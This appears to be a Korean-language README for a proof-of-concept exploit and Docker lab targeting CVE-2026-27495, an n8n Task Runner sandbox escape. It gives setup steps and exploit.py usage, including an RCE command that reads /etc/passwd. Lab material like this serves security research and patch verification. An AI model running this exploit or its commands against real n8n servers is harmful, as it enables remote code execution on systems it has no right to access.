
Proof-of-concept exploit and lab environment for CVE-2026-27495
호스트-영역 객체 누출을 통한 n8n JavaScript Task Runner 샌드박스 탈출.
| CVE | CVE-2026-27495 |
| CVSS | 9.4 (Critical) |
| CWE | CWE-94 — Code Injection |
| 영향 받는 버전 | n8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0 |
| 수정된 버전 | 1.123.22 / 2.9.3 / 2.10.1 |
| 공격 표면 | Code node (인증 필요, Task Runners 활성화) |
docker compose up -d
n8n이 시작될 때까지 약 15초 기다린 후, http://localhost:5678을 열고 소유자 계정을 생성합니다 (이메일: [email protected], 비밀번호: TestPassword123!).
pip install requests
샌드박스 탈출 탐지 :
python3 exploit.py --probe
RCE — docker-compose.yml에서 NODE_FUNCTION_ALLOW_BUILTIN=* 주석을 해제한 후 다시 시작합니다:
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"
최초 설정 (자동으로 소유자 계정 생성):
python3 exploit.py --setup --probe
Options:
--url URL n8n 기본 URL (기본값: http://localhost:5678)
--email EMAIL 로그인 이메일 (기본값: [email protected])
--password PASSWORD 로그인 비밀번호
--cmd CMD 실행할 OS 명령어 (RCE)
--setup 소유자 계정 생성 (새 인스턴스)
--probe 샌드박스 탈출만 탐지 (RCE 없음, 모든 구성에서 작동)
--proxy PROXY HTTP 프록시 (예: http://127.0.0.1:8080)
승인된 보안 연구 및 교육 목적으로만 사용하십시오.